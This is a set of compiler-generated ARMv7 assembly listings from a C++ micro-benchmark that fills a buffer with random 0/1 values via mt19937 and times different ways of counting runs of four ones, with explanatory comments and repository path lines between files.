_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
@ std::mt19937::_M_gen_rand(): the MT19937 twist -- regenerate all 624
@ state words in place and reset the index (offset 2496) to 0.
@ Identical instantiation to the copy in the other .s files of this set.
@ r12 = 0x9908b0df (matrix constant, XORed in when the low bit is set).
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
@ Words 0..226: state[i] = state[i+397] ^ (merged-bits >> 1) ^ (odd mask)
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
@ Words 227..622 via a negated decrementing index.
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
@ Final word 623 wraps to state[0]/state[396]; index := 0.
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_mul.cpp,%function
_GLOBAL__sub_I_mul.cpp: @ @_GLOBAL__sub_I_mul.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
@ Static-initialization stub: construct std::ios_base::Init (_ZStL8__ioinit)
@ and register its destructor with __cxa_atexit (reached by tail call).
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
@ __cxa_atexit(&ios_base::Init::~Init, &__ioinit, &__dso_handle)
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr} @ restore before the tail call
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_mul.cpp, .Ltmp17-_GLOBAL__sub_I_mul.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_mul.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,520
|
exp/cpp_and_and/ARMv7/s/minus_mul_plus.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "minus_mul_plus.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
@ int main() for the minus_mul_plus.cpp benchmark. Outline:
@  1. build a std::mt19937 on the stack (624 words at [sp,#32],
@     word index at [sp,#2528]) and a uniform_int_distribution<int>
@     param {0, 1} at [sp,#24]/[sp,#28];
@  2. heap-allocate 64,000,000 bytes (16,000,000 ints, pointer in r4)
@     and fill them with 0/1 draws;
@  3. time (chrono::system_clock) a scan over every 4-byte offset that
@     increments [sp,#20] when, for the four consecutive ints a,b,c,d:
@       (a-1)^2 + (b-1)^2 + (c-1)^2 == (1-d)*(d-1)   [= -(d-1)^2]
@     which for 0/1 inputs holds exactly when all four equal 1;
@  4. print "time: <seconds> 1111s: <count>\n", delete the buffer, return 0.
@ Compiler-generated (clang 3.5.0); comments only, do not hand-edit.
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655 @ r2 = 0x6c078965 = 1812433253 (MT19937 seed multiplier)
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
@ state[i] = 1812433253 * (state[i-1] ^ (state[i-1] >> 30)) + i
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528] @ index = 624: twist on first draw
mov r0, #1
str r5, [sp, #24] @ distribution param a = 0
str r0, [sp, #28] @ distribution param b = 1
.Ltmp0:
movw r8, #36864
movt r8, #976 @ r8 = 64,000,000 bytes = 16,000,000 ints
mov r0, r8
bl _Znwj @ operator new(64000000)
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset @ zero-fill
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
@ v[i] = dist(gen)
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20] @ match counter = 0
bl _ZNSt6chrono3_V212system_clock3nowEv @ start timestamp -> [sp,#8]
movw r0, #36852
movt r0, #976 @ loop bound 63,999,988: stop 3 elements before the end
.LBB0_6: @ =>This Inner Loop Header: Depth=1
@ r2 accumulates (a-1)^2 + (b-1)^2 + (c-1)^2; r1 = (1-d)*(d-1).
mov r1, r4
ldr r2, [r1, r5]!
add r5, r5, #4
sub r2, r2, #1
ldmib r1, {r3, r7}
mul r2, r2, r2
sub r3, r3, #1
ldr r1, [r1, #12]
mla r2, r3, r3, r2
sub r6, r1, #1
rsb r1, r1, #1
sub r3, r7, #1
mul r1, r1, r6
mla r2, r3, r3, r2
cmp r2, r1
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
cmp r5, r0
bne .LBB0_6
@ BB#7:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv @ end timestamp -> [sp,#0]
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i @ cout << "time: "
.Ltmp4:
@ BB#8:
@ elapsed = (end - start) as 64-bit ns count, converted to double seconds.
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0 @ 1e-9: ns -> s
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_ @ cout << seconds
mov r5, r0
.Ltmp6:
@ BB#9: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i @ << " 1111s: "
.Ltmp8:
@ BB#10: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_ @ << match count
.Ltmp10:
@ BB#11: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i @ << "\n"
.Ltmp12:
@ BB#12: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_14
@ BB#13:
mov r0, r4
bl _ZdlPv @ operator delete (vector destructor)
.LBB0_14: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_15:
@ Landing pads: free the buffer (if allocated) and re-raise.
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_18
@ BB#16:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_17:
.Ltmp2:
mov r5, r0
.LBB0_18: @ %_ZNSt6vectorIiSaIiEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#19:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
@ LSDA call-site table: cleanup (delete the buffer) when operator new or
@ the ostream calls throw. Offsets are position-critical -- do not edit.
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
@ int std::uniform_int_distribution<int>::operator()(std::mt19937 &urng,
@                                                    const param_type &p)
@ Identical instantiation to the copy in the other .s files of this set.
@ r0 = this, r1 = &urng, r2 = &p {a, b}; returns a + uniform draw in [0, b-a].
@ Compiler-generated (clang 3.5.0); comments only, do not hand-edit.
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0 @ range = b - a
cmn r0, #1
beq .LBB1_6 @ full 32-bit range: no rejection needed
@ BB#1:
@ scale = UINT_MAX / (range+1); accept draws < scale*(range+1) (r7).
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236 @ r6 = 0x9d2c5680 (tempering mask b)
movt r4, #61382 @ r4 = 0xefc60000 (tempering mask c)
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
@ MT19937 tempering, then rejection test:
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv @ result = draw / scale
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0 @ return a + draw
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
@ std::mt19937::_M_gen_rand(): the MT19937 twist -- regenerate all 624
@ state words in place and reset the index (offset 2496) to 0.
@ Identical instantiation to the copy in the other .s files of this set.
@ r12 = 0x9908b0df (matrix constant, XORed in when the low bit is set).
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
@ Words 0..226: state[i] = state[i+397] ^ (merged-bits >> 1) ^ (odd mask)
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
@ Words 227..622 via a negated decrementing index.
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
@ Final word 623 wraps to state[0]/state[396]; index := 0.
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_minus_mul_plus.cpp,%function
_GLOBAL__sub_I_minus_mul_plus.cpp: @ @_GLOBAL__sub_I_minus_mul_plus.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_minus_mul_plus.cpp, .Ltmp17-_GLOBAL__sub_I_minus_mul_plus.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_minus_mul_plus.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,685
|
exp/cpp_and_and/ARMv7/s/andand.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "andand.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #36864
movt r8, #976
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
movw r0, #36852
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
ldr r1, [r4, r5]
cmp r1, #1
bne .LBB0_9
@ BB#7: @ in Loop: Header=BB0_6 Depth=1
add r1, r4, r5
ldr r2, [r1, #4]
cmp r2, #1
ldreq r2, [r1, #8]
cmpeq r2, #1
bne .LBB0_9
@ BB#8: @ in Loop: Header=BB0_6 Depth=1
ldr r1, [r1, #12]
cmp r1, #1
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
.LBB0_9: @ %._crit_edge7
@ in Loop: Header=BB0_6 Depth=1
add r5, r5, #4
cmp r5, r0
bne .LBB0_6
@ BB#10:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#11:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#12: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#13: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#14: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#15: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_17
@ BB#16:
mov r0, r4
bl _ZdlPv
.LBB0_17: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
